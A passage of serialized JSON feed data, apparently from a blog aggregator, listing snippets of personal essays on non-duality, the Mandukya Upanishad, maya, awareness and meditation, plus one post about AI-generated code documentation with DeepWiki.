[&#8230;]",[148,149,224],{"slug":466,"guid":3321,"title":467,"link":468,"pubDate":469,"content":3322,"contentSnippet":470,"tags":3323},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4861","Many spiritual traditions say that enlightenment reveals the world as an illusion and lets you see true reality. But what does that really mean? The Mandukya Upanishad describes four states of human experience: waking, dreaming, deep sleep, and a fourth called Turiya. The Four States The first three—waking, dreaming, and deep sleep—are familiar to us. [&#8230;]",[149],{"slug":473,"guid":3325,"title":474,"link":475,"pubDate":476,"content":3326,"contentSnippet":477,"tags":3327},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4835","Introduction Recently my older brother stumbled upon a AI documentation generator called DeepWiki, and shared a full documentation of my Scrite project he generated using it. DeepWiki can parse the source code of any project hosted on a public Git repository like GitHub and construct documentation explaining the architecture and implementation. Benefits of AI-Documentation Back [&#8230;]",[148,149],{"slug":480,"guid":3329,"title":481,"link":482,"pubDate":483,"content":3330,"contentSnippet":484,"tags":3331},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4831","On my morning walk in the park today, I had this very surreal knowing that my mind was I was reduced to a mere witness of this whole show. Yet, oddly, it did not feel like a reduction. It felt like the mind was dipping into &#8220;me&#8221; to construct both the world and the experiencer [&#8230;]",[148,486,149],{"slug":502,"guid":3333,"title":503,"link":504,"pubDate":505,"content":3334,"contentSnippet":506,"tags":3335},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4793","In our everyday experience, we often think of ourselves as a separate &#8220;Self&#8221;-a permanent entity that is distinct from everything else in the world, including other people and things. This sense of separation can lead to anxiety, fear, and other forms of suffering. Non-duality offers a radical shift in perspective. Instead of seeing ourselves as [&#8230;]",[148,149],{"slug":509,"guid":3337,"title":510,"link":511,"pubDate":512,"content":3338,"contentSnippet":513,"tags":3339},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4787","Memory is whatever the mind brings up. Hypothetically, the mind can create random images, thoughts, and bodily sensations that feel like memories. Even when the body-mind system is working perfectly, memory is always at the mercy of whatever it pulls up in the moment. It&#8217;s possible that the body-mind system isn&#8217;t buggy and it never [&#8230;]",[148,149],{"slug":516,"guid":3341,"title":517,"link":518,"pubDate":519,"content":3342,"contentSnippet":520,"tags":3343},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4748","The term māyā is often translated as &#8220;illusion&#8221;—a powerful force that makes the dualistic world appear real, even though only the non-dual Brahman truly exists. However, I prefer to interpret māyā not as &#8220;illusion&#8221; but as &#8220;disappearance&#8221; or &#8220;vanishing&#8221; (in its street-Kannada sense). In truth, all of reality is constantly vanishing into a void. This [&#8230;]",[148,149],{"slug":535,"guid":3345,"title":536,"link":537,"pubDate":538,"content":3346,"contentSnippet":539,"tags":3347},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4727","Awareness is always of what has already happened. I become aware of what I see only after the seeing has occurred.I become aware of what I hear only after the hearing has happened.I become aware of what I touch only after the touch has occurred.I become aware of what I taste only after the tasting [&#8230;]",[148,149],{"slug":757,"guid":3349,"title":758,"link":759,"pubDate":760,"content":3350,"contentSnippet":761,"tags":3351},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4621","When I look at an object, like the cup on the table next to my laptop right now, the visual feel of the object is entirely driven by the physical object itself. In this case, I am not imagining or making up the visual feel of the cup. It looks the way the cup intends [&#8230;]",[148,149],{"slug":868,"guid":3353,"title":869,"link":870,"pubDate":871,"content":3354,"contentSnippet":872,"tags":3355},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4564","I think the purpose of meditation matters a lot. If we are after enlightenment, then its pursuit becomes a craving in itself and that ends up being a hindrance. However, if our intention is to end suffering, then we have a far more practical goal and infact letting go of craving becomes so much more [&#8230;]",[148],{},"planet\u002Fpnudupa","4xPJsHmHctvZ9PJQoCGPcNyzPE-wV8Vdz2tZDWWzxQM",1774934841012]